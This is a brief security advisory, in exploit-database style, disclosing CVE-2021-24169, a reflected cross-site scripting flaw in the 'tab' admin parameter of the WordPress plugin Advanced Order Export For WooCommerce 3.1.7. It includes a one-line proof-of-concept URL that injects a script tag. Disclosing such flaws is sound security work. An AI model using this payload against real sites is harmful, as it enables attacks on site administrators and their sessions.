WordPress Advanced Order Export For WooCommerce plugin version 3.1.7 suffers from a cross site scripting vulnerability.
advisories | CVE-2021-24169
# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 15/2/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
# Version: 3.1.7
# Tested on: Windows 10
# CVE: CVE-2021-241691. Description:
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
Related posts:
Google Debuts Quality Ratings for Security Bug Disclosures
Satanic group gets school district to drop rule banning clothes with satanic, cultic references. Sat...
Sued by Meta, Freenom Halts Domain Registrations
Simple Online College Entrance Exam System 1.0 SQL Injection
Netskope Enables Secure Enterprise Use of ChatGPT and Generative AI Applications